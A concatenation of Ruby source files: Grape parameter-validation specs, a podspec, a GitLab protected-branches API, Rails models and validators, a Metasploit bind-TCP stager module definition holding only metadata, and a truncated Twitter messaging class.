'all_or_none_of works!'
end
data = {
orders: [
{ id: 77, drugs: { batch_no: 'A1234567', batch_id: '12' } },
{ id: 70 }
]
}
get '/all_or_none_of', data
expect(last_response.body).to eq('all_or_none_of works!')
expect(last_response.status).to eq(200)
end
end
context 'multiple validation errors' do
before do
subject.params do
requires :yolo
requires :swag
end
subject.get '/two_required' do
'two required works'
end
end
it 'throws the validation errors' do
get '/two_required'
expect(last_response.status).to eq(400)
expect(last_response.body).to match(/yolo is missing/)
expect(last_response.body).to match(/swag is missing/)
end
end
context 'custom validation' do
let(:custom_validator) do
Class.new(Grape::Validations::Validators::Base) do
def validate_param!(attr_name, params)
return if params[attr_name] == 'im custom'
raise Grape::Exceptions::Validation.new(params: [@scope.full_name(attr_name)], message: 'is not custom!')
end
end
end
before do
described_class.register_validator('customvalidator', custom_validator)
end
after do
described_class.deregister_validator('customvalidator')
end
context 'when using optional with a custom validator' do
before do
subject.params do
optional :custom, customvalidator: true
end
subject.get '/optional_custom' do
'optional with custom works!'
end
end
it 'validates when param is present' do
get '/optional_custom', custom: 'im custom'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with custom works!')
get '/optional_custom', custom: 'im wrong'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
it "skips validation when parameter isn't present" do
get '/optional_custom'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with custom works!')
end
it 'validates with custom validator when param present and incorrect type' do
subject.params do
optional :custom, type: String, customvalidator: true
end
get '/optional_custom', custom: 123
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
end
context 'when using requires with a custom validator' do
before do
subject.params do
requires :custom, customvalidator: true
end
subject.get '/required_custom' do
'required with custom works!'
end
end
it 'validates when param is present' do
get '/required_custom', custom: 'im wrong, validate me'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
get '/required_custom', custom: 'im custom'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required with custom works!')
end
it 'validates when param is not present' do
get '/required_custom'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is missing, custom is not custom!')
end
context 'nested namespaces' do
before do
subject.params do
requires :custom, customvalidator: true
end
subject.namespace 'nested' do
get 'one' do
'validation failed'
end
namespace 'nested' do
get 'two' do
'validation failed'
end
end
end
subject.namespace 'peer' do
get 'one' do
'no validation required'
end
namespace 'nested' do
get 'two' do
'no validation required'
end
end
end
subject.namespace 'unrelated' do
params do
requires :name
end
get 'one' do
'validation required'
end
namespace 'double' do
get 'two' do
'no validation required'
end
end
end
end
specify 'the parent namespace uses the validator' do
get '/nested/one', custom: 'im wrong, validate me'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
specify 'the nested namespace inherits the custom validator' do
get '/nested/nested/two', custom: 'im wrong, validate me'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom!')
end
specify 'peer namespaces does not have the validator' do
get '/peer/one', custom: 'im not validated'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('no validation required')
end
specify 'namespaces nested in peers should also not have the validator' do
get '/peer/nested/two', custom: 'im not validated'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('no validation required')
end
specify 'when nested, specifying a route should clear out the validations for deeper nested params' do
get '/unrelated/one'
expect(last_response.status).to eq(400)
get '/unrelated/double/two'
expect(last_response.status).to eq(200)
end
end
end
context 'when using options on param' do
let(:custom_validator_with_options) do
Class.new(Grape::Validations::Validators::Base) do
def validate_param!(attr_name, params)
return if params[attr_name] == @option[:text]
raise Grape::Exceptions::Validation.new(params: [@scope.full_name(attr_name)], message: message)
end
end
end
before do
described_class.register_validator('customvalidator_with_options', custom_validator_with_options)
end
after do
described_class.deregister_validator('customvalidator_with_options')
end
before do
subject.params do
optional :custom, customvalidator_with_options: { text: 'im custom with options', message: 'is not custom with options!' }
end
subject.get '/optional_custom' do
'optional with custom works!'
end
end
it 'validates param with custom validator with options' do
get '/optional_custom', custom: 'im custom with options'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with custom works!')
get '/optional_custom', custom: 'im wrong'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('custom is not custom with options!')
end
end
end
context 'named' do
context 'can be defined' do
it 'in helpers' do
subject.helpers do
params :pagination do
end
end
end
it 'in helper module which kind of Grape::DSL::Helpers::BaseHelper' do
shared_params = Module.new do
extend Grape::DSL::Helpers::BaseHelper
params :pagination do
end
end
subject.helpers shared_params
end
end
context 'can be included in usual params' do
before do
shared_params = Module.new do
extend Grape::DSL::Helpers::BaseHelper
params :period do
optional :start_date
optional :end_date
end
end
subject.helpers shared_params
subject.helpers do
params :pagination do
optional :page, type: Integer
optional :per_page, type: Integer
end
end
end
it 'by #use' do
subject.params do
use :pagination
end
expect(declared_params).to eq %i[page per_page]
end
it 'by #use with multiple params' do
subject.params do
use :pagination, :period
end
expect(declared_params).to eq %i[page per_page start_date end_date]
end
end
context 'with block' do
before do
subject.helpers do
params :order do |options|
optional :order, type: Symbol, values: %i[asc desc], default: options[:default_order]
optional :order_by, type: Symbol, values: options[:order_by], default: options[:default_order_by]
end
end
subject.format :json
subject.params do
use :order, default_order: :asc, order_by: %i[name created_at], default_order_by: :created_at
end
subject.get '/order' do
{
order: params[:order],
order_by: params[:order_by]
}
end
end
it 'returns defaults' do
get '/order'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq({ order: :asc, order_by: :created_at }.to_json)
end
it 'overrides default value for order' do
get '/order?order=desc'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq({ order: :desc, order_by: :created_at }.to_json)
end
it 'overrides default value for order_by' do
get '/order?order_by=name'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq({ order: :asc, order_by: :name }.to_json)
end
it 'fails with invalid value' do
get '/order?order=invalid'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('{"error":"order does not have a valid value"}')
end
end
end
context 'documentation' do
it 'can be included with a hash' do
documentation = { example: 'Joe' }
subject.params do
requires 'first_name', documentation: documentation
end
subject.get '/' do
end
expect(subject.routes.first.params['first_name'][:documentation]).to eq(documentation)
end
end
context 'all or none' do
context 'optional params' do
before do
subject.resource :custom_message do
params do
optional :beer
optional :wine
optional :juice
all_or_none_of :beer, :wine, :juice, message: 'all params are required or none is required'
end
get '/all_or_none' do
'all_or_none works!'
end
end
end
context 'with a custom validation message' do
it 'errors when any one is present' do
get '/custom_message/all_or_none', beer: 'string'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice all params are required or none is required'
end
it 'works when all params are present' do
get '/custom_message/all_or_none', beer: 'string', wine: 'anotherstring', juice: 'anotheranotherstring'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'all_or_none works!'
end
it 'works when none are present' do
get '/custom_message/all_or_none'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'all_or_none works!'
end
end
end
end
context 'mutually exclusive' do
context 'optional params' do
context 'with custom validation message' do
it 'errors when two or more are present' do
subject.resources :custom_message do
params do
optional :beer
optional :wine
optional :juice
mutually_exclusive :beer, :wine, :juice, message: 'are mutually exclusive cannot pass both params'
end
get '/mutually_exclusive' do
'mutually_exclusive works!'
end
end
get '/custom_message/mutually_exclusive', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive cannot pass both params'
end
end
it 'errors when two or more are present' do
subject.params do
optional :beer
optional :wine
optional :juice
mutually_exclusive :beer, :wine, :juice
end
subject.get '/mutually_exclusive' do
'mutually_exclusive works!'
end
get '/mutually_exclusive', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive'
end
end
context 'more than one set of mutually exclusive params' do
context 'with a custom validation message' do
it 'errors for all sets' do
subject.resources :custom_message do
params do
optional :beer
optional :wine
mutually_exclusive :beer, :wine, message: 'are mutually exclusive pass only one'
optional :nested, type: Hash do
optional :scotch
optional :aquavit
mutually_exclusive :scotch, :aquavit, message: 'are mutually exclusive pass only one'
end
optional :nested2, type: Array do
optional :scotch2
optional :aquavit2
mutually_exclusive :scotch2, :aquavit2, message: 'are mutually exclusive pass only one'
end
end
get '/mutually_exclusive' do
'mutually_exclusive works!'
end
end
get '/custom_message/mutually_exclusive', beer: 'true', wine: 'true', nested: { scotch: 'true', aquavit: 'true' }, nested2: [{ scotch2: 'true' }, { scotch2: 'true', aquavit2: 'true' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'beer, wine are mutually exclusive pass only one, nested[scotch], nested[aquavit] are mutually exclusive pass only one, nested2[1][scotch2], nested2[1][aquavit2] are mutually exclusive pass only one'
)
end
end
it 'errors for all sets' do
subject.params do
optional :beer
optional :wine
mutually_exclusive :beer, :wine
optional :nested, type: Hash do
optional :scotch
optional :aquavit
mutually_exclusive :scotch, :aquavit
end
optional :nested2, type: Array do
optional :scotch2
optional :aquavit2
mutually_exclusive :scotch2, :aquavit2
end
end
subject.get '/mutually_exclusive' do
'mutually_exclusive works!'
end
get '/mutually_exclusive', beer: 'true', wine: 'true', nested: { scotch: 'true', aquavit: 'true' }, nested2: [{ scotch2: 'true' }, { scotch2: 'true', aquavit2: 'true' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive, nested[scotch], nested[aquavit] are mutually exclusive, nested2[1][scotch2], nested2[1][aquavit2] are mutually exclusive'
end
end
context 'in a group' do
it 'works when only one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
mutually_exclusive :beer, :wine, :juice
end
end
subject.get '/mutually_exclusive_group' do
'mutually_exclusive_group works!'
end
get '/mutually_exclusive_group', drink: { beer: 'true' }
expect(last_response.status).to eq(200)
end
it 'errors when more than one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
mutually_exclusive :beer, :wine, :juice
end
end
subject.get '/mutually_exclusive_group' do
'mutually_exclusive_group works!'
end
get '/mutually_exclusive_group', drink: { beer: 'true', juice: 'true', wine: 'true' }
expect(last_response.status).to eq(400)
end
end
context 'mutually exclusive params inside Hash group' do
it 'invalidates if request param is invalid type' do
subject.params do
optional :wine, type: Hash do
optional :grape
optional :country
mutually_exclusive :grape, :country
end
end
subject.post '/mutually_exclusive' do
'mutually_exclusive works!'
end
post '/mutually_exclusive', wine: '2015 sauvignon'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'wine is invalid'
end
end
end
context 'exactly one of' do
context 'params' do
before do
subject.resources :custom_message do
params do
optional :beer
optional :wine
optional :juice
exactly_one_of :beer, :wine, :juice, message: 'are missing, exactly one parameter is required'
end
get '/exactly_one_of' do
'exactly_one_of works!'
end
end
subject.params do
optional :beer
optional :wine
optional :juice
exactly_one_of :beer, :wine, :juice
end
subject.get '/exactly_one_of' do
'exactly_one_of works!'
end
end
context 'with a custom validation message' do
it 'errors when none are present' do
get '/custom_message/exactly_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, exactly one parameter is required'
end
it 'succeeds when one is present' do
get '/custom_message/exactly_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'exactly_one_of works!'
end
it 'errors when two or more are present' do
get '/custom_message/exactly_one_of', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are missing, exactly one parameter is required'
end
end
it 'errors when none are present' do
get '/exactly_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, exactly one parameter must be provided'
end
it 'succeeds when one is present' do
get '/exactly_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'exactly_one_of works!'
end
it 'errors when two or more are present' do
get '/exactly_one_of', beer: 'string', wine: 'anotherstring'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine are mutually exclusive'
end
end
context 'nested params' do
before do
subject.params do
requires :nested, type: Hash do
optional :beer_nested
optional :wine_nested
optional :juice_nested
exactly_one_of :beer_nested, :wine_nested, :juice_nested
end
optional :nested2, type: Array do
optional :beer_nested2
optional :wine_nested2
optional :juice_nested2
exactly_one_of :beer_nested2, :wine_nested2, :juice_nested2
end
end
subject.get '/exactly_one_of_nested' do
'exactly_one_of works!'
end
end
it 'errors when none are present' do
get '/exactly_one_of_nested'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'nested is missing, nested[beer_nested], nested[wine_nested], nested[juice_nested] are missing, exactly one parameter must be provided'
end
it 'succeeds when one is present' do
get '/exactly_one_of_nested', nested: { beer_nested: 'string' }
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'exactly_one_of works!'
end
it 'errors when two or more are present' do
get '/exactly_one_of_nested', nested: { beer_nested: 'string' }, nested2: [{ beer_nested2: 'string', wine_nested2: 'anotherstring' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'nested2[0][beer_nested2], nested2[0][wine_nested2] are mutually exclusive'
end
end
end
context 'at least one of' do
context 'params' do
before do
subject.resources :custom_message do
params do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice, message: 'are missing, please specify at least one param'
end
get '/at_least_one_of' do
'at_least_one_of works!'
end
end
subject.params do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice
end
subject.get '/at_least_one_of' do
'at_least_one_of works!'
end
end
context 'with a custom validation message' do
it 'errors when none are present' do
get '/custom_message/at_least_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, please specify at least one param'
end
it 'does not error when one is present' do
get '/custom_message/at_least_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
it 'does not error when two are present' do
get '/custom_message/at_least_one_of', beer: 'string', wine: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
end
it 'errors when none are present' do
get '/at_least_one_of'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'beer, wine, juice are missing, at least one parameter must be provided'
end
it 'does not error when one is present' do
get '/at_least_one_of', beer: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
it 'does not error when two are present' do
get '/at_least_one_of', beer: 'string', wine: 'string'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
end
context 'nested params' do
before do
subject.params do
requires :nested, type: Hash do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice
end
optional :nested2, type: Array do
optional :beer
optional :wine
optional :juice
at_least_one_of :beer, :wine, :juice
end
end
subject.get '/at_least_one_of_nested' do
'at_least_one_of works!'
end
end
it 'errors when none are present' do
get '/at_least_one_of_nested'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq 'nested is missing, nested[beer], nested[wine], nested[juice] are missing, at least one parameter must be provided'
end
it 'does not error when one is present' do
get '/at_least_one_of_nested', nested: { beer: 'string' }, nested2: [{ beer: 'string' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
it 'does not error when two are present' do
get '/at_least_one_of_nested', nested: { beer: 'string', wine: 'string' }, nested2: [{ beer: 'string', wine: 'string' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq 'at_least_one_of works!'
end
end
end
context 'in a group' do
it 'works when only one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: { beer: 'true' }
expect(last_response.status).to eq(200)
end
it 'errors when no parameter from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: {}
expect(last_response.status).to eq(400)
end
it 'errors when more than one from the set is present' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: { beer: 'true', juice: 'true', wine: 'true' }
expect(last_response.status).to eq(400)
end
it 'does not falsely think the param is there if it is provided outside the block' do
subject.params do
group :drink, type: Hash do
optional :wine
optional :beer
optional :juice
exactly_one_of :beer, :wine, :juice
end
end
subject.get '/exactly_one_of_group' do
'exactly_one_of_group works!'
end
get '/exactly_one_of_group', drink: { foo: 'bar' }, beer: 'true'
expect(last_response.status).to eq(400)
end
end
end
end
| 33.847903 | 213 | 0.565336 |
79837a40ff50dd982ebdc0c9defc8bcb54ccfe03 | 872 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-cidscan"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "9.0" }
s.source = { :git => "https://github.com/P4IT/react-native-cidscan.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,a,swift}"
s.resources = "ios/*.{png}"
s.static_framework = true
s.vendored_libraries = 'ios/libCaptureIDLibrary.a'
s.ios.xcconfig = { "HEADER_SEARCH_PATHS" => "$(PODS_ROOT)/#{s.name}, #{File.join(File.dirname(__FILE__), 'ios')}", "LIBRARY_SEARCH_PATHS" => "#{File.join(File.dirname(__FILE__), 'ios')}" }
s.dependency "React-Core"
end
| 34.88 | 190 | 0.619266 |
33dea25289a319d77894d49df0f63ecb2e353d67 | 3,806 | # frozen_string_literal: true
module API
class ProtectedBranches < Grape::API
include PaginationParams
BRANCH_ENDPOINT_REQUIREMENTS = API::NAMESPACE_OR_PROJECT_REQUIREMENTS.merge(name: API::NO_SLASH_URL_PART_REGEX)
before { authorize_admin_project }
helpers Helpers::ProtectedBranchesHelpers
params do
requires :id, type: String, desc: 'The ID of a project'
end
resource :projects, requirements: API::NAMESPACE_OR_PROJECT_REQUIREMENTS do
desc "Get a project's protected branches" do
success Entities::ProtectedBranch
end
params do
use :pagination
end
# rubocop: disable CodeReuse/ActiveRecord
get ':id/protected_branches' do
protected_branches = user_project.protected_branches.preload(:push_access_levels, :merge_access_levels)
present paginate(protected_branches), with: Entities::ProtectedBranch, project: user_project
end
# rubocop: enable CodeReuse/ActiveRecord
desc 'Get a single protected branch' do
success Entities::ProtectedBranch
end
params do
requires :name, type: String, desc: 'The name of the branch or wildcard'
end
# rubocop: disable CodeReuse/ActiveRecord
get ':id/protected_branches/:name', requirements: BRANCH_ENDPOINT_REQUIREMENTS do
protected_branch = user_project.protected_branches.find_by!(name: params[:name])
present protected_branch, with: Entities::ProtectedBranch, project: user_project
end
# rubocop: enable CodeReuse/ActiveRecord
desc 'Protect a single branch or wildcard' do
success Entities::ProtectedBranch
end
params do
requires :name, type: String, desc: 'The name of the protected branch'
optional :push_access_level, type: Integer,
values: ProtectedBranch::PushAccessLevel.allowed_access_levels,
desc: 'Access levels allowed to push (defaults: `40`, maintainer access level)'
optional :merge_access_level, type: Integer,
values: ProtectedBranch::MergeAccessLevel.allowed_access_levels,
desc: 'Access levels allowed to merge (defaults: `40`, maintainer access level)'
use :optional_params_ee
end
# rubocop: disable CodeReuse/ActiveRecord
post ':id/protected_branches' do
protected_branch = user_project.protected_branches.find_by(name: params[:name])
if protected_branch
conflict!("Protected branch '#{params[:name]}' already exists")
end
declared_params = declared_params(include_missing: false)
api_service = ::ProtectedBranches::ApiService.new(user_project, current_user, declared_params)
protected_branch = api_service.create
if protected_branch.persisted?
present protected_branch, with: Entities::ProtectedBranch, project: user_project
else
render_api_error!(protected_branch.errors.full_messages, 422)
end
end
# rubocop: enable CodeReuse/ActiveRecord
desc 'Unprotect a single branch'
params do
requires :name, type: String, desc: 'The name of the protected branch'
end
# rubocop: disable CodeReuse/ActiveRecord
delete ':id/protected_branches/:name', requirements: BRANCH_ENDPOINT_REQUIREMENTS do
protected_branch = user_project.protected_branches.find_by!(name: params[:name])
destroy_conditionally!(protected_branch) do
destroy_service = ::ProtectedBranches::DestroyService.new(user_project, current_user)
destroy_service.execute(protected_branch)
end
end
# rubocop: enable CodeReuse/ActiveRecord
end
end
end
| 40.063158 | 118 | 0.686548 |
1d05fa2b7f863f87399f44ac2d9fcc8362955d71 | 43 | module RubyExample
VERSION = "0.1.0"
end
| 10.75 | 19 | 0.697674 |
e85c09525926d1578a0f8b491ce5895c9b5564be | 1,169 | module Carto
class AccessToken < OauthToken
# Compatibility with ActiveRecord inheritance. When migrating to ActiveRecord,
# the class name changed from ::AccessToken to ::Carto::AccessToken
# Source: https://yiming.dev/blog/2017/12/07/add-sti-to-a-legacy-activerecord-model/
self.store_full_sti_class = false
before_create :set_authorized_at
after_create :store_api_credentials
after_destroy :clear_api_credentials
private
def metadata_key
"rails:oauth_access_tokens:#{token}"
end
def set_authorized_at
self.authorized_at = Time.now
end
def store_api_credentials
$api_credentials.hset metadata_key, "consumer_key", client_application.key
$api_credentials.hset metadata_key, "consumer_secret", client_application.secret
$api_credentials.hset metadata_key, "access_token_token", token
$api_credentials.hset metadata_key, "access_token_secret", secret
$api_credentials.hset metadata_key, "user_id", user_id
$api_credentials.hset metadata_key, "time", authorized_at
end
def clear_api_credentials
$api_credentials.del metadata_key
end
end
end
| 30.763158 | 88 | 0.747648 |
e9933e7acd363f480db729cd2a62796a894e24cb | 845 | # frozen_string_literal: true
require 'rspec'
RSpec.shared_context 'WidgetsCommon' do
before(:all) do
LibyuiClient.timeout = 0
LibyuiClient.interval = 0
@app = LibyuiClient::App.new(host: 'www.example.com', port: '9999')
end
# Common Request/Response parts
let(:widgets_url) { 'http://www.example.com:9999/widgets' }
let(:id) { { id: 'libyui' } }
let(:query_id) { { query: id } }
let(:status404) { { status: 404 } }
let(:disabled_widget) { { body: '[{"enabled": "false"}]' } }
# Common Stubbed Requests
# POST Stubs
let(:stub_post) { stub_request(:post, widgets_url) }
let(:stub_post_404) { stub_post.to_return(status404) }
# GET Stubs
let(:stub_get) { stub_request(:get, widgets_url) }
let(:stub_get_id) { stub_get.with(query_id) }
let(:stub_get_id_404) { stub_get_id.to_return(status404) }
end
| 29.137931 | 71 | 0.671006 |
d596b3f566f61b94096aae5f9b14444c54ca8e1d | 1,008 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/bind_tcp'
module MetasploitModule
CachedSize = 318
include Msf::Payload::Stager
include Msf::Payload::Windows::BindTcp
def self.handler_type_alias
"bind_ipv6_tcp_uuid"
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind IPv6 TCP Stager with UUID Support (Windows x86)',
'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x86)',
'Author' => [ 'hdm', 'skape', 'sf', 'OJ Reeves' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => false }
))
end
def use_ipv6
true
end
def include_send_uuid
true
end
end
| 23.44186 | 87 | 0.628968 |
edd016097ed63fe89516aae41cd4a4a7a94b2d87 | 916 | require 'spec_helper'
require 'hiera-puppet-helper'
describe 'rjil::trust_selfsigned_cert' do
let :params do
{
:cert => '/etc/ssl/certs/jiocloud.com.crt',
:ssl_cert_package => 'jiocloud-ssl-certificate',
}
end
let :facts do
{
:operatingsystem => 'Ubuntu',
:osfamily => 'Debian',
:lsbdsitid => 'ubuntu',
}
end
context 'with defaults' do
it do
should contain_package('ca-certificates')
should contain_package('jiocloud-ssl-certificate')
should contain_file('/usr/local/share/ca-certificates/selfsigned.crt') \
.with_ensure('link') \
.with_source('/etc/ssl/certs/jiocloud.com.crt') \
.that_notifies('Exec[update-cacerts]')
should contain_exec('update-cacerts') \
.with_command('update-ca-certificates --fresh') \
.with_refreshonly(true)
end
end
end
| 23.487179 | 78 | 0.611354 |
38ed3531c02042ed59c05c945aa5cf33d8eb1b63 | 999 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_02_04_094303) do
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
end
| 41.625 | 86 | 0.762763 |
f8b4b187312a358a017a335ce81804784921d914 | 159 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Locations::Application
| 31.8 | 67 | 0.773585 |
79ff442fb6afac978ee8871dfe5deb11309e79f2 | 4,624 | class Menu
class Node
attr_accessor :parent, :parent_id, :children
attr_accessor :site_controller_id, :controller_action_id, :content_page_id
attr_accessor :id, :name, :label, :url
def initialize
@parent = nil
end
def setup(item)
@parent_id = item.parent_id
@name = item.name
@id = item.id
@label = item.label
if item.controller_action
@site_controller_id = item.controller_action.controller.id
@controller_action_id = item.controller_action.id
else
@site_controller_id = nil
@controller_action_id = nil
end
@content_page_id = (item.content_page.id if item.content_page)
@url = ''
if item.controller_action
@url = if item.controller_action.url_to_use and
!item.controller_action.url_to_use.empty?
item.controller_action.url_to_use
else
"/#{item.controller_action.controller.name}/#{item.controller_action.name}"
end
else
@url = "/#{item.content_page.name}"
end
end
def site_controller
unless @site_controller
if @site_controller_id
@site_controller = SiteController.find(@site_controller_id)
end
end
end
def controller_action
unless @controller_action
if @controller_action_id
@controller_action = ControllerAction.find(@controller_action_id)
end
end
end
def content_page
unless @content_page
@content_page = ContentPage.find(@content_page_id) if @content_page_id
end
end
def add_child(child)
@children ||= []
@children << child.id
end
end # class Node
attr_accessor :root, :selected
def initialize(role = nil)
@root = Node.new
@by_id = {}
@by_name = {}
@selected = {}
@vector = []
@crumbs = []
items = nil
if role
unless role.cache[:credentials].permission_ids.nil?
items = MenuItem.items_for_permissions(role.cache[:credentials].permission_ids)
end
else # No role given: build menu of everything
items = MenuItem.items_for_permissions
end
if items
unless items.empty?
# Build hashes of items by name and id
for item in items do
# Convert keys to integers (for braindead DB backends)
# item.menu_item_id &&= item.menu_item_id.to_i
# item.menu_item_seq &&= item.menu_item_seq.to_i
# item.menu_item_parent_id &&= item.menu_item_parent_id.to_i
# item.site_controller_id &&= item.site_controller_id.to_i
# item.controller_action_id &&= item.controller_action_id.to_i
# item.content_page_id &&= item.content_page_id.to_i
# item.permission_id &&= item.permission_id.to_i
node = Node.new
node.setup(item)
@by_id[item.id] = node
@by_name[item.name] = node
end
# Then build tree of items
for item in items do
node = @by_id[item.id]
p_id = node.parent_id
if p_id
@by_id[p_id].add_child(node) if @by_id.key?(p_id)
else
@root.add_child(node)
end
end
end # if items.size > 0
if @root.children and [email protected]?
select(@by_id[@root.children[0]].name)
end
end # if items
end
# Selects the menu item for the given name, if it exists in this
# menu. If not returns nil.
def select(name)
if @by_name.key?(name)
node = @by_name[name]
@selected = {}
@vector = []
@crumbs = []
while node && node.id
@selected[node.id] = node
@vector.unshift node
@crumbs.unshift node.id
node = @by_id[node.parent_id]
end
@vector.unshift @root
return @by_name[name]
end
end
def get_item(item_id)
@by_id[item_id]
end
# Returns the array of items at the given level.
def get_menu(level)
@vector[level].children if @vector.length > level
end
# Returns the name of the currently-selected item
# or nil if no item is selected.
def selected
@vector[@vector.length - 1].name unless @vector.empty?
end
# Returns true if the specified item is selected; false if otherwise.
def selected?(menu_id)
@selected.key?(menu_id) ? true : false
end
def crumbs
crumbs = []
for crumb in @crumbs do
item = get_item(crumb)
crumbs << item
end
crumbs
end
end
| 26.574713 | 92 | 0.600562 |
4ad6e19dd0bb1d2d0597c11d4bd434d87d713cbd | 891 | cask 'switchresx' do
version '4.5.2'
sha256 :no_check # required as upstream package is updated in-place
url "http://www.madrau.com/data/switchresx/SwitchResX#{version.to_i}.zip"
name 'SwitchResX'
homepage 'http://www.madrau.com'
license :freemium
prefpane 'SwitchResX.prefPane'
uninstall :quit => [
'fr.madrau.switchresx.app',
'fr.madrau.switchresx.daemon', # note, daemon does not :quit cleanly
],
:signal => [
['INT', 'fr.madrau.switchresx.daemon'],
['KILL', 'fr.madrau.switchresx.daemon'],
],
:delete => [
'/Library/ScriptingAdditions/SwitchResX Extensions.osax',
'/Library/ScriptingAdditions/SwitchResX Menu.osax',
]
end
| 35.64 | 93 | 0.521886 |
f73e2c43a3019f0823a7646d58ea6b3a3c303ed2 | 439 | class PdfValidator < ActiveModel::EachValidator
def validate_each(record, attribute, value)
return unless value.present? && File.exist?(value.path)
PDF::Reader.new(value.path)
unless value.path.downcase.match?(/\.pdf$/)
record.errors[attribute] << "is a PDF, but has the extension '#{File.extname(value.path)}'"
end
rescue PDF::Reader::MalformedPDFError
record.errors[attribute] << "is not a PDF"
end
end
| 31.357143 | 97 | 0.699317 |
019e881dea79a9c098fae9b0c8b8f3a63c4e55ff | 820 | require 'rubygems'
require 'json'
require 'net/http'
require 'net/https'
require 'uri'
load 'blueprints.rb'
load 'config-oauth.rb'
load 'tls.rb'
class Message
def direct_message(user_id, screen_name, text)
instructions = Blueprints.new
api_url = instructions.getAPI_URL
command_url = instructions.getMessage_URL
address = URI("#{api_url}#{command_url}")
